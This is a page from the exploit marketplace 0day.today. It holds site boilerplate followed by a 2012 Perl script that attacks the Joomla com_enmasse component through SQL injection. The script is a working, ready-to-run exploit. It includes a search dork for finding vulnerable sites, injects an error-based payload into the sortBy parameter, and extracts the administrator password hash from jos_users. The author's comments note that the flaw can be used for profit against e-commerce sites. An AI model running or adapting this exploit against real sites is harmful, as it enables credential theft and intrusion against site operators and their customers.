0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Joomla Component com_enmasse Remote Sql Injection Exploit
# Exploit Title: Joomla com_enmasse Remote Exploit # Author: Daniel Barragan "D4NB4R" # Espaсol # hola, este exploit afecta sitios de ecommerce por lo cual el exploit solo dara una muestra # de la extraccion posible de datos, No me hago responsable del uso que se le de. ya que es # posible obtener lucro economico por medio del mismo. El script esta hecho con tablas por # defecto de joomla. # English # hi, this exploit affects ecommerce sites so the exploit only give a sample of the # possible extraction of data, I am not responsible for any use that is given. since # it is possible to obtain economic profit through this. the script is done with joomla default tables. #!/usr/bin/perl -w ######################################## # Exploit Title: Joomla com_enmasse Remote Exploit # # Dork: inurl:index.php?option=com_enmasse # # Date: [06-08-2012] # # Author: Daniel Barragan "D4NB4R" # # Twitter: @D4NB4R # # site: http://poisonsecurity.wordpress.com/ # # Vendor: http://www.matamko.com/ # # Version: 1.2.0.4 (last update on Jul 27, 2012) # # License: Enmasse 6 Months Support & Subscription - USD$358.20 # # Demo: http://www.matamko.com/products/filexpress/live-demo.html # # Tested on: [Linux(bt5)-Windows(7ultimate)] # # Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc.... ######################################## print "\t\t\n\n"; print "\t\n"; print "\t Daniel Barragan D4NB4R \n"; print "\t \n"; print "\t Joomla com_enmasse Remote Exploit \n"; print "\t\n\n"; use LWP::UserAgent; print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); $concatene="concat(password)"; $table="jos_users"; $d4nb4r="floor"; $com="com_enmasse"; $seleccione="select"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target . "index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=".$com."&sortBy=117 and(".$seleccione." 1 from(".$seleccione." count(*),concat((".$seleccione." (".$seleccione." (".$seleccione." ".$concatene." from ".$table." Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C".$d4nb4r."(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/) { print "\n Hash Admin : $1\n\n"; print " El exploit fue exitoso si desea ver mas datos modifique el script\n"; print " The exploit was successful if you want to see more data modify the script\n"; } else{print "\n[-] No se pudo, intente manualmente\n";} #####Daniel Barragan D4NB4R 2012################ # 0day.today [2024-09-29] #